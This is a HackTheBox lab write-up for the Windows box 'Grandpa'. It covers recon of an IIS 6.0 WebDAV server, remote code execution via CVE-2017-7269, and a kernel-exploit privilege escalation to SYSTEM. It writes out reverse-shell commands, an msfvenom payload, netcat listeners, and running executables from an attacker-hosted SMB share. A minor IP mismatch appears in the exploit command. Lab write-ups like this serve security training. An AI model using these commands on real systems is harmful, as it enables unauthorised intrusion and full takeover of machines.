Grandpa
An easy Windows box from HackTheBox, get initial access via RCE from a vulnerable version of IIS, then escalate privileges with a kernel exploit.
Recon
Running the usual nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 18 Sep 2022 22:53:00 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
See a similar box to Grandma, with all the HTTP methods allowed, however after spending some time trying, just don’t have write access at all, so no web shell is possible
Instead, can try a remote exploit on IIS 6.0
searchsploit iis 6.0
...
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
windows/remote/41738.py
...
This looks promising, can get remote code execution via shellcode included in a request
Exploitation
The exploit in searchsploit didn’t work, had to go digging around for different versions of the same CVE (CVE-2017-7269)
And finally found this one which worked out of the box
Firing it at the server and setting up a listener on port 9001, get a reverse shell
python2 exploit.py 10.10.10.15 80 KALI_IP 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
Then, running systeminfo followed by wesng, find that the box is very vulnerable, and lots of privesc possibilities exist
I opted to use MS015-077, running both the privesc executable and the reverse shell from a SMB share
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > rev.exe
Set up a reverse listener
rlwrap nc -lnvp 4444
And expose the executables using the smbserver script again
smbserver.py share .
Then on the victim
c:\windows\system32\inetsrv>\\10.10.14.5\share\elevator.exe \\10.10.14.5\share\rev.exe
And get root!
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\system